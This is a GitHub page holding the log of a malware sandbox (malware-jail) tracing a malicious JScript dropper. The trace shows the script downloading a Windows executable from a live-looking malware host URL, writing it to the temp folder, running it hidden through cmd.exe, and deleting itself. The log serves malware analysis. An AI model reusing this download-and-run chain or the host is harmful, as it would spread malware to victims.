forked from HynekPetrak/malware-jail
-
Notifications
You must be signed in to change notification settings - Fork 1
/
cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out
82 lines (82 loc) · 5.15 KB
/
cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
30 Sep 01:02:11 - mailware-jail, a malware sandbox ver. 0.5
30 Sep 01:02:11 - ------------------------
30 Sep 01:02:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
30 Sep 01:02:11 - Malware files: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Output file for sandbox dump: sandbox_dump_after.json
30 Sep 01:02:11 - Output directory for generated files: output/
30 Sep 01:02:11 - ==> Preparing Sandbox environment.
30 Sep 01:02:11 - => Executing: env/utils.js
30 Sep 01:02:11 - => Executing: env/eval.js
30 Sep 01:02:11 - Preparing sandbox to intercept eval() calls.
30 Sep 01:02:11 - => Executing: env/function.js
30 Sep 01:02:11 - Preparing sandbox to intercept 'new Function()' calls.
30 Sep 01:02:11 - => Executing: env/wscript.js
30 Sep 01:02:11 - Preparing sandbox to emulate WScript environment.
30 Sep 01:02:11 - => Executing: env/browser.js
30 Sep 01:02:11 - Preparing sandbox to emulate Browser environment (default = IE11).
30 Sep 01:02:11 - Created: window[1]
30 Sep 01:02:11 - Created: document[2]
30 Sep 01:02:11 - document[2].createElement(html)
30 Sep 01:02:11 - Element[3] created, named: 'html'
30 Sep 01:02:11 - document[2].createElement(body)
30 Sep 01:02:11 - Element[5] created, named: 'body'
30 Sep 01:02:11 - document[2].body = 'Element[5]'
30 Sep 01:02:11 - document[2].createElement(head)
30 Sep 01:02:11 - Element[7] created, named: 'head'
30 Sep 01:02:11 - Element[3].appendChild(Element[7])
30 Sep 01:02:11 - Element[3].firstChild set
30 Sep 01:02:11 - document[2].body.get() => Element[5]
30 Sep 01:02:11 - Element[3].appendChild(Element[5])
30 Sep 01:02:11 - => Executing: env/agents.js
30 Sep 01:02:11 - Setting Browser environment to: IE8 on Win10 64bit
30 Sep 01:02:11 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated)
30 Sep 01:02:11 - => Executing: env/other.js
30 Sep 01:02:11 - => Executing: env/console.js
30 Sep 01:02:11 - ==> Executing malware file(s).
30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Strict mode: false
30 Sep 01:02:11 - Calling eval() no.: 1
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[9]
30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[12]
30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
30 Sep 01:02:11 - Created: ADODB_Stream[14]
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
30 Sep 01:02:15 - ADODB_Stream[14].type = '1'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Open()
30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'
30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Close()
30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
30 Sep 01:02:15 - ==> Cleaning up sandbox.
30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
30 Sep 01:02:16 - Generated file saved
30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json